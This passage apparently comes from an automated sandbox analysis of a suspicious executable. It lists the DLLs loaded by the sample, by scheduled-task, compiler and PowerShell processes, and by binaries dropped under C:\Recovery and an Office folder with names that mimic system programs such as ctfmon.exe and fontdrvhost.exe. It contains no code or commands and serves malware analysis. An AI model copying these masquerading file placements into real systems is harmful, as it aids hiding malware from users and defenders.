                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: ktmw32.dllJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: rtutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: schannel.dllJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: mskeyprotect.dllJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: ncryptsslp.dllJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: windowscodecs.dllJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: dlnashext.dllJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: wpdshext.dllJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeSection loaded: version.dllJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeSection loaded: version.dllJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Recovery\ctfmon.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Recovery\ctfmon.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Recovery\ctfmon.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Recovery\ctfmon.exeSection loaded: version.dllJump to behavior
                            Source: C:\Recovery\ctfmon.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Recovery\ctfmon.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Recovery\ctfmon.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Recovery\ctfmon.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Recovery\ctfmon.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Recovery\ctfmon.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Recovery\ctfmon.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Recovery\ctfmon.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Recovery\ctfmon.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Recovery\ctfmon.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Recovery\ctfmon.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Recovery\ctfmon.exeSection loaded: mscoree.dll
                            Source: C:\Recovery\ctfmon.exeSection loaded: kernel.appcore.dll
                            Source: C:\Recovery\ctfmon.exeSection loaded: version.dll
                            Source: C:\Recovery\ctfmon.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Recovery\ctfmon.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Recovery\ctfmon.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Recovery\ctfmon.exeSection loaded: uxtheme.dll
                            Source: C:\Recovery\ctfmon.exeSection loaded: windows.storage.dll
                            Source: C:\Recovery\ctfmon.exeSection loaded: wldp.dll
                            Source: C:\Recovery\ctfmon.exeSection loaded: profapi.dll
                            Source: C:\Recovery\ctfmon.exeSection loaded: cryptsp.dll
                            Source: C:\Recovery\ctfmon.exeSection loaded: rsaenh.dll
                            Source: C:\Recovery\ctfmon.exeSection loaded: cryptbase.dll
                            Source: C:\Recovery\ctfmon.exeSection loaded: sspicli.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeSection loaded: mscoree.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeSection loaded: apphelp.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeSection loaded: kernel.appcore.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeSection loaded: version.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeSection loaded: uxtheme.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeSection loaded: windows.storage.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeSection loaded: wldp.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeSection loaded: profapi.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeSection loaded: cryptsp.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeSection loaded: rsaenh.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeSection loaded: cryptbase.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeSection loaded: sspicli.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeSection loaded: mscoree.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeSection loaded: kernel.appcore.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeSection loaded: version.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeSection loaded: uxtheme.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeSection loaded: windows.storage.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeSection loaded: wldp.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeSection loaded: profapi.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeSection loaded: cryptsp.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeSection loaded: rsaenh.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeSection loaded: cryptbase.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: version.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: wldp.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: profapi.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: version.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: wldp.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: profapi.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
